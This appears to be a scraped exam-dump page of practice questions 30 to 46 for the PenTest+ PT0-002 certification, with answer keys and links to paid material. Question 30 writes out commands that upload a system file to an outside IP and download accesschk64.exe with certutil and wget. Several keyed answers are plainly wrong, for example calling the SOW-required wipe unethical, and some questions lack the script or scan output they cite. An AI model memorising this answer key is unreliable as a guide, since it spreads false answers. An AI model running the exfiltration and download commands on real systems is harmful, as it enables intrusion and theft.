PT0-002 Practice Exam and Study Guides - Verified By ActualCollection Updated 112 Questions
2021 Updated Verified Pass PT0-002 Study Guides & Best Courses
NEW QUESTION 30
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- A. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
- B. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
- C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
- D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
Answer: A
NEW QUESTION 31
A penetration tester wrote the following script to be used in one engagement:
Which of the following actions will this script perform?
- A. Attempt to flood open ports.
- B. Look for open ports.
- C. Create an encrypted tunnel.
- D. Listen for a reverse shell.
Answer: B
NEW QUESTION 32
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
- A. Disable HTTP/301 redirect configuration.
- B. Eliminate network management and control interfaces.
- C. Enforce enhanced password complexity requirements.
- D. Create an out-of-band network for management.
- E. Disable or upgrade SSH daemon.
- F. Implement a better method for authentication.
Answer: A,F
NEW QUESTION 33
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions
NEW QUESTION 34
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
- A. Open-source research
- B. Traffic sniffing
- C. A vulnerability scan
- D. An Nmap scan
- E. A ping sweep
- F. Port knocking
Answer: C,D
NEW QUESTION 35
A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?
- A. OllyDbg
- B. GDB
- C. Drozer
- D. Immunity Debugger
Answer: A
NEW QUESTION 36
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:
Which of the following would be a recommendation for remediation?
- A. Implement a patch management plan
- B. Utilize the secure software development life cycle
- C. Deploy a user training program
- D. Configure access controls on each of the servers
Answer: A
NEW QUESTION 37
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?
- A. Multiple handshakes
- B. Encrypted file transfers
- C. User hashes sent over SMB
- D. IP addresses
Answer: C
NEW QUESTION 38
A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?
- A. home.html
- B. about
- C. index.html
- D. info
Answer: B
NEW QUESTION 39
A penetration tester is reviewing the following SOW prior to engaging with a client:
"Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
- A. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
- B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
- C. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
- D. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
- E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
- F. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
Answer: E,F
NEW QUESTION 40
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
- A. ROE
- B. MSA
- C. NDA
- D. SLA
Answer: C
NEW QUESTION 41
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
- A. Cain and Abel
- B. John the Ripper
- C. Mimikatz
- D. Hydra
Answer: B
NEW QUESTION 42
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?
- A. bcrypt
- B. SHA-1
- C. PBKDF2
- D. MD5
Answer: D
NEW QUESTION 43
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
- A. Android
- B. Linux
- C. Windows
- D. Apple
Answer: C
NEW QUESTION 44
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
- A. To validate the billing information with the client
- B. As proof in case they are discovered
- C. As backup in case the original documents are lost
- D. To guide them through the building entrances
Answer: B
NEW QUESTION 45
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?
- A. Wireshark
- B. Aircrack-ng
- C. Kismet
- D. Wifite
Answer: B
NEW QUESTION 46
......
Ultimate Guide to the PT0-002 - Latest Edition Available Now: https://www.actualcollection.com/PT0-002-exam-questions.html
2021 Updated Verified Pass PT0-002 Exam - Real Questions & Answers: https://drive.google.com/open?id=1oe2sZ2lUiGfDxoa83hq_SMXYjmaHTvpi